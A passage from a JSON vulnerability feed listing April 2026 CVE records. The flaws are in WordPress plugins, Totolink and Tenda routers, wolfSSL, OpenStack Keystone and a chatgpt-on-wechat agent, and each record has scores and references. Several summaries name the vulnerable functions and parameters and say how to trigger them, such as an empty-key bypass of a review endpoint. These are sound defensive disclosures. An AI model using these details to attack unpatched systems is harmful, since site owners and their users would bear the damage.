post.","cvss":6.4,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.4,"cvss_v4":null,"epss":0.00042,"ranking_epss":0.12768,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://plugins.trac.wordpress.org/browser/addfunc-head-footer-code/tags/2.3/addfunc-head-footer-code.php#L63","https://plugins.trac.wordpress.org/browser/addfunc-head-footer-code/tags/2.3/addfunc-head-footer-code.php#L74","https://plugins.trac.wordpress.org/browser/addfunc-head-footer-code/tags/2.3/addfunc-head-footer-code.php#L85","https://plugins.trac.wordpress.org/browser/addfunc-head-footer-code/trunk/addfunc-head-footer-code.php#L63","https://plugins.trac.wordpress.org/browser/addfunc-head-footer-code/trunk/addfunc-head-footer-code.php#L74","https://plugins.trac.wordpress.org/browser/addfunc-head-footer-code/trunk/addfunc-head-footer-code.php#L85","https://plugins.trac.wordpress.org/changeset?old_path=%2Faddfunc-head-footer-code/tags/2.3&new_path=%2Faddfunc-head-footer-code/tags/2.4","https://www.wordfence.com/threat-intel/vulnerabilities/id/2f2d1a67-1d9b-4b73-988e-085eaa7474c6?source=cve"],"published_time":"2026-04-10T04:16:59","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-5999","summary":"A vulnerability has been found in JeecgBoot up to 3.9.1. This impacts an unknown function of the component SysAnnouncementController. Such manipulation leads to improper authorization. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. 
The vendor confirmed the issue and will provide a fix in the upcoming release.","cvss":5.3,"cvss_version":4.0,"cvss_v2":6.5,"cvss_v3":6.3,"cvss_v4":5.3,"epss":0.00043,"ranking_epss":0.12853,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/jeecgboot/JeecgBoot/","https://github.com/jeecgboot/JeecgBoot/issues/9508","https://github.com/jeecgboot/JeecgBoot/issues/9508#issuecomment-4199090102","https://vuldb.com/submit/793656","https://vuldb.com/vuln/356553","https://vuldb.com/vuln/356553/cti"],"published_time":"2026-04-10T03:16:04","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6000","summary":"A vulnerability was found in code-projects Online Library Management System 1.0. Affected is an unknown function of the file /sql/library.sql of the component SQL Database Backup File Handler. Performing a manipulation results in information disclosure. The attack may be initiated remotely. The exploit has been made public and could be used.","cvss":2.1,"cvss_version":4.0,"cvss_v2":5.0,"cvss_v3":4.3,"cvss_v4":2.1,"epss":0.00032,"ranking_epss":0.09005,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://code-projects.org/","https://github.com/ahmadmarz10-hub/CVEsMarz/blob/main/Sensitive%20Information%20Disclosure%20in%20Online%20Library%20Management%20System%20PHP%20Exposed%20Database%20Backup.md","https://vuldb.com/submit/793895","https://vuldb.com/vuln/356554","https://vuldb.com/vuln/356554/cti"],"published_time":"2026-04-10T03:16:04","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6003","summary":"A security vulnerability has been detected in code-projects Simple IT Discussion Forum 1.0. This issue affects some unknown processing of the file /admin/user.php. Such manipulation of the argument fname leads to cross site scripting. The attack may be performed from remote. 
The exploit has been disclosed publicly and may be used.","cvss":4.8,"cvss_version":4.0,"cvss_v2":3.3,"cvss_v3":2.4,"cvss_v4":4.8,"epss":0.0003,"ranking_epss":0.0845,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://code-projects.org/","https://github.com/zulu225588/zulu-loudong/issues/2","https://vuldb.com/submit/794332","https://vuldb.com/vuln/356559","https://vuldb.com/vuln/356559/cti"],"published_time":"2026-04-10T03:16:04","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6004","summary":"A vulnerability was detected in code-projects Simple IT Discussion Forum 1.0. Impacted is an unknown function of the file /delete-category.php. Performing a manipulation of the argument cat_id results in sql injection. It is possible to initiate the attack remotely. The exploit is now public and may be used.","cvss":6.9,"cvss_version":4.0,"cvss_v2":7.5,"cvss_v3":7.3,"cvss_v4":6.9,"epss":0.0003,"ranking_epss":0.08446,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://code-projects.org/","https://github.com/zulu225588/zulu-loudong/issues/1","https://vuldb.com/submit/794333","https://vuldb.com/vuln/356560","https://vuldb.com/vuln/356560/cti"],"published_time":"2026-04-10T03:16:04","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-33551","summary":"An issue was discovered in OpenStack Keystone 14 through 26 before 26.1.1, 27.0.0, 28.0.0, and 29.0.0. Restricted application credentials can create EC2 credentials. By using a restricted application credential to call the EC2 credential creation API, an authenticated user with only a reader role may obtain an EC2/S3 credential that carries the full set of the parent user's S3 permissions, effectively bypassing the role restrictions imposed on the application credential. 
Only deployments that use restricted application credentials in combination with the EC2/S3 compatibility API (swift3 / s3api) are affected.","cvss":3.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":3.5,"cvss_v4":null,"epss":0.0002,"ranking_epss":0.05422,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://bugs.launchpad.net/keystone/+bug/2142138","https://security.openstack.org/ossa/OSSA-2026-005.html","http://www.openwall.com/lists/oss-security/2026/04/07/12","https://bugs.launchpad.net/keystone/+bug/2142138"],"published_time":"2026-04-10T03:16:02","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-5996","summary":"A security vulnerability has been detected in Totolink A7100RU 7.4cu.2313_b20191024. The affected element is the function setAdvancedInfoShow of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. The manipulation of the argument tty_server leads to os command injection. It is possible to initiate the attack remotely. The exploit has been disclosed publicly and may be used.","cvss":8.9,"cvss_version":4.0,"cvss_v2":10.0,"cvss_v3":9.8,"cvss_v4":8.9,"epss":0.00892,"ranking_epss":0.75567,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/Litengzheng/vuldb_new/blob/main/A7100RU/vul_168/README.md","https://vuldb.com/submit/792044","https://vuldb.com/vuln/356550","https://vuldb.com/vuln/356550/cti","https://www.totolink.net/"],"published_time":"2026-04-10T02:16:04","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-5997","summary":"A vulnerability was detected in Totolink A7100RU 7.4cu.2313_b20191024. The impacted element is the function setLoginPasswordCfg of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. The manipulation of the argument admpass results in os command injection. It is possible to launch the attack remotely. 
The exploit is now public and may be used.","cvss":8.9,"cvss_version":4.0,"cvss_v2":10.0,"cvss_v3":9.8,"cvss_v4":8.9,"epss":0.00892,"ranking_epss":0.75567,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/Litengzheng/vuldb_new/blob/main/A7100RU/vul_169/README.md","https://vuldb.com/submit/792045","https://vuldb.com/vuln/356551","https://vuldb.com/vuln/356551/cti","https://www.totolink.net/"],"published_time":"2026-04-10T02:16:04","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-5998","summary":"A flaw has been found in zhayujie chatgpt-on-wechat CowAgent up to 2.0.4. This affects the function dispatch of the file agent/memory/service.py of the component API Memory Content Endpoint. This manipulation of the argument filename causes path traversal. The attack can be initiated remotely. The exploit has been published and may be used. Upgrading to version 2.0.5 mitigates this issue. Patch name: 174ee0cafc9e8e9d97a23c305418251485b8aa89. It is recommended to upgrade the affected component. 
The vendor was contacted early, responded in a very professional manner and quickly released a fixed version of the affected product.","cvss":5.5,"cvss_version":4.0,"cvss_v2":5.0,"cvss_v3":5.3,"cvss_v4":5.5,"epss":0.00048,"ranking_epss":0.14831,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/zhayujie/chatgpt-on-wechat/commit/174ee0cafc9e8e9d97a23c305418251485b8aa89","https://github.com/zhayujie/chatgpt-on-wechat/issues/2734","https://github.com/zhayujie/chatgpt-on-wechat/issues/2734#issue-4178013778","https://github.com/zhayujie/chatgpt-on-wechat/releases/tag/2.0.5","https://vuldb.com/submit/793558","https://vuldb.com/vuln/356552","https://vuldb.com/vuln/356552/cti"],"published_time":"2026-04-10T02:16:04","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-3360","summary":"The Tutor LMS – eLearning and online course solution plugin for WordPress is vulnerable to an Insecure Direct Object Reference in all versions up to, and including, 3.9.7. This is due to missing authentication and authorization checks in the `pay_incomplete_order()` function. The function accepts an attacker-controlled `order_id` parameter and uses it to look up order data, then writes billing fields to the order owner's profile (`$order_data->user_id`) without verifying the requester's identity or ownership. 
Because the Tutor nonce (`_tutor_nonce`) is exposed on public frontend pages, this makes it possible for unauthenticated attackers to overwrite the billing profile (name, email, phone, address) of any user who has an incomplete manual order, by sending a crafted POST request with a guessed or enumerated `order_id`.","cvss":7.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.5,"cvss_v4":null,"epss":0.00102,"ranking_epss":0.27911,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://plugins.trac.wordpress.org/browser/tutor/tags/3.9.7/classes/Tutor.php#L563","https://plugins.trac.wordpress.org/browser/tutor/tags/3.9.7/ecommerce/CheckoutController.php#L1059","https://plugins.trac.wordpress.org/browser/tutor/tags/3.9.7/ecommerce/CheckoutController.php#L108","https://plugins.trac.wordpress.org/browser/tutor/trunk/ecommerce/CheckoutController.php#L1059","https://plugins.trac.wordpress.org/changeset/3496394/tutor/trunk/ecommerce/CheckoutController.php","https://www.wordfence.com/threat-intel/vulnerabilities/id/7f365519-dd0a-4f39-880d-7216ce2f7d1e?source=cve"],"published_time":"2026-04-10T02:16:03","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-4057","summary":"The Download Manager plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the `makeMediaPublic()` and `makeMediaPrivate()` functions in all versions up to, and including, 3.3.51. This is due to the functions only checking for `edit_posts` capability without verifying post ownership via `current_user_can('edit_post', $id)`, and the destructive operations executing before the admin-level check in `mediaAccessControl()`. 
This makes it possible for authenticated attackers, with Contributor-level access and above, to strip all protection metadata (password, access restrictions, private flag) from any media file they do not own, making admin-protected files publicly accessible via their direct URL.","cvss":4.3,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":4.3,"cvss_v4":null,"epss":0.00031,"ranking_epss":0.0893,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://plugins.trac.wordpress.org/browser/download-manager/tags/3.3.51/src/MediaLibrary/MediaAccessControl.php#L237","https://plugins.trac.wordpress.org/browser/download-manager/tags/3.3.51/src/MediaLibrary/MediaAccessControl.php#L257","https://plugins.trac.wordpress.org/browser/download-manager/trunk/src/MediaLibrary/MediaAccessControl.php#L237","https://plugins.trac.wordpress.org/browser/download-manager/trunk/src/MediaLibrary/MediaAccessControl.php#L257","https://plugins.trac.wordpress.org/changeset/3492316/download-manager/trunk/src/MediaLibrary/MediaAccessControl.php","https://plugins.trac.wordpress.org/changeset?old_path=%2Fdownload-manager/tags/3.3.51&new_path=%2Fdownload-manager/tags/3.3.52","https://www.wordfence.com/threat-intel/vulnerabilities/id/a6b02846-61be-4571-921d-53df5493f856?source=cve"],"published_time":"2026-04-10T02:16:03","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-4305","summary":"The Royal WordPress Backup & Restore Plugin plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'wpr_pending_template' parameter in all versions up to, and including, 1.0.16 due to insufficient input validation. 
This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick an administrator into performing an action such as clicking on a link.","cvss":6.1,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.1,"cvss_v4":null,"epss":0.00033,"ranking_epss":0.09364,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://plugins.trac.wordpress.org/browser/royal-backup-reset/tags/1.0.16/assets/backup-reminder.js#L751","https://plugins.trac.wordpress.org/browser/royal-backup-reset/tags/1.0.16/royal-backup-reset.php#L803","https://plugins.trac.wordpress.org/changeset?old_path=%2Froyal-backup-reset/tags/1.0.16&new_path=%2Froyal-backup-reset/tags/1.0.17","https://www.wordfence.com/threat-intel/vulnerabilities/id/f9e0c658-b37c-4780-9589-6def9e36539b?source=cve"],"published_time":"2026-04-10T02:16:03","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-4351","summary":"The Perfmatters plugin for WordPress is vulnerable to arbitrary file overwrite via path traversal in all versions up to, and including, 2.5.9. This is due to the `PMCS::action_handler()` method processing the bulk action `activate`/`deactivate` handlers without any authorization check or nonce verification. The `$_GET['snippets'][]` values are passed unsanitized to `Snippet::activate()`/`Snippet::deactivate()` which call `Snippet::update()` then `file_put_contents()` with the traversed path. 
This makes it possible for authenticated attackers, with Subscriber-level access and above, to overwrite arbitrary files on the server with a fixed PHP docblock content, potentially causing denial of service by corrupting critical files like `.htaccess` or `index.php`.","cvss":8.1,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":8.1,"cvss_v4":null,"epss":0.00055,"ranking_epss":0.17084,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://perfmatters.io/docs/changelog/","https://www.wordfence.com/threat-intel/vulnerabilities/id/c172ab2b-ce1f-4a0d-b31f-b75ff2f03506?source=cve"],"published_time":"2026-04-10T02:16:03","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-4664","summary":"The Customer Reviews for WooCommerce plugin for WordPress is vulnerable to authentication bypass in all versions up to, and including, 5.103.0. This is due to the `create_review_permissions_check()` function comparing the user-supplied `key` parameter against the order's `ivole_secret_key` meta value using strict equality (`===`), without verifying that the stored key is non-empty. For orders where no review reminder email has been sent, the `ivole_secret_key` meta is not set, causing `get_meta()` to return an empty string. An attacker can supply `key: \"\"` to match this empty value and bypass the permission check. This makes it possible for unauthenticated attackers to submit, modify, and inject product reviews on any product — including products not associated with the referenced order — via the REST API endpoint `POST /ivole/v1/review`. 
Reviews are auto-approved by default since `ivole_enable_moderation` defaults to `\"no\"`.","cvss":5.3,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":5.3,"cvss_v4":null,"epss":0.00147,"ranking_epss":0.35038,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://plugins.trac.wordpress.org/browser/customer-reviews-woocommerce/tags/5.102.0/includes/emails/class-cr-email.php#L345","https://plugins.trac.wordpress.org/browser/customer-reviews-woocommerce/tags/5.102.0/includes/reviews/class-cr-endpoint.php#L646","https://plugins.trac.wordpress.org/browser/customer-reviews-woocommerce/tags/5.102.0/includes/reviews/class-cr-endpoint.php#L654","https://plugins.trac.wordpress.org/browser/customer-reviews-woocommerce/tags/5.102.0/includes/reviews/class-cr-endpoint.php#L655","https://plugins.trac.wordpress.org/changeset?old_path=%2Fcustomer-reviews-woocommerce/tags/5.103.0&new_path=%2Fcustomer-reviews-woocommerce/tags/5.104.0","https://wordpress.org/plugins/customer-reviews-woocommerce/","https://www.wordfence.com/threat-intel/vulnerabilities/id/27e3dfe3-ad33-4d0c-a999-d0734df2f59b?source=cve"],"published_time":"2026-04-10T02:16:03","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-4977","summary":"The UsersWP – Front-end login form, User Registration, User Profile & Members Directory plugin for WordPress is vulnerable to Improper Access Control in all versions up to, and including, 1.2.58. This is due to insufficient field-level permission validation in the upload_file_remove() AJAX handler where the $htmlvar parameter is not validated against a whitelist of allowed fields or checked against the field's for_admin_use property. 
This makes it possible for authenticated attackers, with subscriber-level access and above, to clear or reset any restricted usermeta column for their own user record, including fields marked as \"For admin use only\", bypassing intended field-level access restrictions.","cvss":4.3,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":4.3,"cvss_v4":null,"epss":0.00031,"ranking_epss":0.0868,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://plugins.trac.wordpress.org/browser/userswp/tags/1.2.54/includes/class-forms.php#L2251","https://plugins.trac.wordpress.org/browser/userswp/tags/1.2.54/includes/class-forms.php#L2274","https://plugins.trac.wordpress.org/browser/userswp/tags/1.2.54/includes/class-meta.php#L165","https://plugins.trac.wordpress.org/browser/userswp/trunk/includes/class-forms.php#L2251","https://plugins.trac.wordpress.org/browser/userswp/trunk/includes/class-forms.php#L2274","https://plugins.trac.wordpress.org/browser/userswp/trunk/includes/class-meta.php#L165","https://plugins.trac.wordpress.org/changeset?old_path=%2Fuserswp/tags/1.2.58&new_path=%2Fuserswp/tags/1.2.59","https://www.wordfence.com/threat-intel/vulnerabilities/id/efee685c-e2cd-471b-aea9-607124df6006?source=cve"],"published_time":"2026-04-10T02:16:03","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-1263","summary":"The Webling plugin for WordPress is vulnerable to Stored Cross-Site Scripting in all versions up to, and including, 3.9.0 due to insufficient input sanitization, insufficient output escaping, and missing capabilities checks in the 'webling_admin_save_form' and 'webling_admin_save_memberlist' functions. 
This makes it possible for authenticated attackers, with Subscriber-level access and above, to inject Webling forms and memberlists with arbitrary web scripts that will execute whenever an administrator views the related form or memberlist area of the WordPress admin.","cvss":6.4,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.4,"cvss_v4":null,"epss":0.00036,"ranking_epss":0.10551,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://plugins.trac.wordpress.org/browser/webling/tags/3.9.0/src/admin/actions/save_form.php#L2","https://plugins.trac.wordpress.org/browser/webling/tags/3.9.0/src/admin/actions/save_memberlist.php#L2","https://plugins.trac.wordpress.org/browser/webling/tags/3.9.0/src/admin/lists/Form_List.php#L122","https://plugins.trac.wordpress.org/browser/webling/tags/3.9.0/src/admin/lists/Memberlist_List.php#L115","https://plugins.trac.wordpress.org/changeset?old_path=%2Fwebling/tags/3.9.0&new_path=%2Fwebling/tags/3.9.1","https://www.wordfence.com/threat-intel/vulnerabilities/id/bd8fbe0d-0709-4fa2-9294-393ddcd05b22?source=cve"],"published_time":"2026-04-10T02:16:02","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-1924","summary":"The Aruba HiSpeed Cache plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.0.4. This is due to missing nonce verification on the `ahsc_ajax_reset_options()` function. 
This makes it possible for unauthenticated attackers to reset all plugin settings to their default values via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","cvss":4.3,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":4.3,"cvss_v4":null,"epss":0.00017,"ranking_epss":0.03842,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://plugins.trac.wordpress.org/browser/aruba-hispeed-cache/tags/3.0.4/aruba-hispeed-cache.php#L631","https://plugins.trac.wordpress.org/browser/aruba-hispeed-cache/tags/3.0.4/aruba-hispeed-cache.php#L632","https://plugins.trac.wordpress.org/changeset?old_path=%2Faruba-hispeed-cache/tags/3.0.4&new_path=%2Faruba-hispeed-cache/tags/3.0.5","https://www.wordfence.com/threat-intel/vulnerabilities/id/d2230151-fde2-43d6-8bff-0d2ffd559ab3?source=cve"],"published_time":"2026-04-10T02:16:02","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-25203","summary":"Samsung MagicINFO 9 Server Incorrect Default Permissions Local Privilege Escalation Vulnerability\n\n\nThis issue affects MagicINFO 9 Server: less than 21.1091.1.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":0.0001,"ranking_epss":0.01035,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://security.samsungtv.com/securityUpdates"],"published_time":"2026-04-10T02:16:02","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-2712","summary":"The WP-Optimize plugin for WordPress is vulnerable to unauthorized access of functionality due to missing capability checks in the `receive_heartbeat()` function in `includes/class-wp-optimize-heartbeat.php` in all versions up to, and including, 4.5.0. 
This is due to the Heartbeat handler directly invoking `Updraft_Smush_Manager_Commands` methods without verifying user capabilities, nonce tokens, or the allowed commands whitelist that the normal AJAX handler (`updraft_smush_ajax`) enforces. This makes it possible for authenticated attackers, with Subscriber-level access and above, to invoke admin-only Smush operations including reading log files (`get_smush_logs`), deleting all backup images (`clean_all_backup_images`), triggering bulk image processing (`process_bulk_smush`), and modifying Smush options (`update_smush_options`).","cvss":5.4,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":5.4,"cvss_v4":null,"epss":0.00038,"ranking_epss":0.11334,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://plugins.trac.wordpress.org/browser/wp-optimize/tags/4.4.1/includes/class-wp-optimize-heartbeat.php#L65","https://plugins.trac.wordpress.org/browser/wp-optimize/tags/4.4.1/includes/class-wp-optimize-heartbeat.php#L82","https://plugins.trac.wordpress.org/browser/wp-optimize/trunk/includes/class-wp-optimize-heartbeat.php#L65","https://research.cleantalk.org/cve-2026-2712/","https://www.wordfence.com/threat-intel/vulnerabilities/id/6a0a376e-ea3a-40ca-9341-f28f92e15e02?source=cve"],"published_time":"2026-04-10T02:16:02","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-5994","summary":"A security flaw has been discovered in Totolink A7100RU 7.4cu.2313_b20191024. This issue affects the function setTelnetCfg of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. Performing a manipulation of the argument telnet_enabled results in os command injection. The attack is possible to be carried out remotely. 
The exploit has been released to the public and may be used for attacks.","cvss":8.9,"cvss_version":4.0,"cvss_v2":10.0,"cvss_v3":9.8,"cvss_v4":8.9,"epss":0.00892,"ranking_epss":0.75567,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/Litengzheng/vuldb_new/blob/main/A7100RU/vul_166/README.md","https://vuldb.com/submit/792042","https://vuldb.com/vuln/356548","https://vuldb.com/vuln/356548/cti","https://www.totolink.net/"],"published_time":"2026-04-10T01:16:42","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-5995","summary":"A weakness has been identified in Totolink A7100RU 7.4cu.2313_b20191024. Impacted is the function setMiniuiHomeInfoShow of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. Executing a manipulation of the argument lan_info can lead to os command injection. The attack may be performed from remote. The exploit has been made available to the public and could be used for attacks.","cvss":8.9,"cvss_version":4.0,"cvss_v2":10.0,"cvss_v3":9.8,"cvss_v4":8.9,"epss":0.00892,"ranking_epss":0.75567,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/Litengzheng/vuldb_new/blob/main/A7100RU/vul_167/README.md","https://vuldb.com/submit/792043","https://vuldb.com/vuln/356549","https://vuldb.com/vuln/356549/cti","https://www.totolink.net/"],"published_time":"2026-04-10T01:16:42","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-5993","summary":"A vulnerability was identified in Totolink A7100RU 7.4cu.2313_b20191024. This vulnerability affects the function setWiFiGuestCfg of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. Such manipulation of the argument wifiOff leads to os command injection. The attack can be executed remotely. 
The exploit is publicly available and might be used.","cvss":8.9,"cvss_version":4.0,"cvss_v2":10.0,"cvss_v3":9.8,"cvss_v4":8.9,"epss":0.00892,"ranking_epss":0.75567,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/Litengzheng/vuldb_new/blob/main/A7100RU/vul_165/README.md","https://vuldb.com/submit/792041","https://vuldb.com/vuln/356547","https://vuldb.com/vuln/356547/cti","https://www.totolink.net/"],"published_time":"2026-04-10T01:16:41","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-5460","summary":"A heap use-after-free exists in wolfSSL's TLS 1.3 post-quantum cryptography (PQC) hybrid KeyShare processing. In the error handling path of TLSX_KeyShare_ProcessPqcHybridClient() in src/tls.c, the inner function TLSX_KeyShare_ProcessPqcClient_ex() frees a KyberKey object upon encountering an error. The caller then invokes TLSX_KeyShare_FreeAll(), which attempts to call ForceZero() on the already-freed KyberKey, resulting in writes of zero bytes over freed heap memory.","cvss":6.3,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":6.3,"epss":0.00042,"ranking_epss":0.12712,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/wolfssl/wolfssl/pull/10092"],"published_time":"2026-04-10T00:16:36","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-5989","summary":"A flaw has been found in Tenda F451 1.0.0.7. Affected is the function fromRouteStatic of the file /goform/RouteStatic. Executing a manipulation of the argument page can lead to stack-based buffer overflow. The attack can be launched remotely. 
The exploit has been published and may be used.","cvss":7.4,"cvss_version":4.0,"cvss_v2":9.0,"cvss_v3":8.8,"cvss_v4":7.4,"epss":0.00046,"ranking_epss":0.14172,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/Jimi-Lab/cve/issues/5","https://vuldb.com/submit/792858","https://vuldb.com/vuln/356543","https://vuldb.com/vuln/356543/cti","https://www.tenda.com.cn/"],"published_time":"2026-04-10T00:16:36","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-5990","summary":"A vulnerability has been found in Tenda F451 1.0.0.7. Affected by this vulnerability is the function fromSafeEmailFilter of the file /goform/SafeEmailFilter. The manipulation of the argument page leads to stack-based buffer overflow. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.","cvss":7.4,"cvss_version":4.0,"cvss_v2":9.0,"cvss_v3":8.8,"cvss_v4":7.4,"epss":0.00046,"ranking_epss":0.14172,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/Jimi-Lab/cve/issues/8","https://vuldb.com/submit/792861","https://vuldb.com/vuln/356544","https://vuldb.com/vuln/356544/cti","https://www.tenda.com.cn/"],"published_time":"2026-04-10T00:16:36","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-5991","summary":"A vulnerability was found in Tenda F451 1.0.0.7. Affected by this issue is the function formWrlExtraSet of the file /goform/WrlExtraSet. The manipulation of the argument GO results in stack-based buffer overflow. The attack may be launched remotely. 
The exploit has been made public and could be used.","cvss":7.4,"cvss_version":4.0,"cvss_v2":9.0,"cvss_v3":8.8,"cvss_v4":7.4,"epss":0.00046,"ranking_epss":0.14172,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/Jimi-Lab/cve/issues/9","https://vuldb.com/submit/792862","https://vuldb.com/vuln/356545","https://vuldb.com/vuln/356545/cti","https://www.tenda.com.cn/"],"published_time":"2026-04-10T00:16:36","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-5992","summary":"A vulnerability was determined in Tenda F451 1.0.0.7. This affects the function fromP2pListFilter of the file /goform/P2pListFilter. This manipulation of the argument page causes stack-based buffer overflow. Remote exploitation of the attack is possible. The exploit has been publicly disclosed and may be utilized.","cvss":7.4,"cvss_version":4.0,"cvss_v2":9.0,"cvss_v3":8.8,"cvss_v4":7.4,"epss":0.00046,"ranking_epss":0.14172,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/Jimi-Lab/cve/issues/10","https://vuldb.com/submit/792863","https://vuldb.com/vuln/356546","https://vuldb.com/vuln/356546/cti","https://www.tenda.com.cn/"],"published_time":"2026-04-10T00:16:36","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-5392","summary":"Heap out-of-bounds read in PKCS7 parsing. A crafted PKCS7 message can trigger an OOB read on the heap. The missing bounds check is in the indefinite-length end-of-content verification loop in PKCS7_VerifySignedData().","cvss":2.3,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":2.3,"epss":0.00014,"ranking_epss":0.02478,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/wolfssl/wolfssl/pull/10039"],"published_time":"2026-04-10T00:16:35","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-5393","summary":"Dual-Algorithm CertificateVerify out-of-bounds read. 
When processing a dual-algorithm CertificateVerify message, an out-of-bounds read can occur on crafted input. This can only occur when --enable-experimental and --enable-dual-alg-certs are used when building wolfSSL.","cvss":6.3,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":6.3,"epss":0.00033,"ranking_epss":0.0931,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/wolfSSL/wolfssl/pull/10079"],"published_time":"2026-04-10T00:16:35","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-5448","summary":"X.509 date buffer overflow in wolfSSL_X509_notAfter / wolfSSL_X509_notBefore. A buffer overflow may occur when parsing date fields from a crafted X.509 certificate via the compatibility layer API. This is only triggered when calling these two APIs directly from an application, and does not affect TLS or certificate verify operations in wolfSSL.","cvss":2.3,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":2.3,"epss":0.00015,"ranking_epss":0.02783,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/wolfSSL/wolfssl/pull/10071"],"published_time":"2026-04-10T00:16:35","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-5987","summary":"A security vulnerability has been detected in Sanluan PublicCMS up to 6.202506.d. This affects the function AbstractFreemarkerView.doRender of the file publiccms-parent/publiccms-core/src/main/java/com/publiccms/common/base/AbstractFreemarkerView.java of the component FreeMarker Template Handler. Such manipulation leads to improper neutralization of special elements used in a template engine. It is possible to launch the attack remotely. The exploit has been disclosed publicly and may be used. 
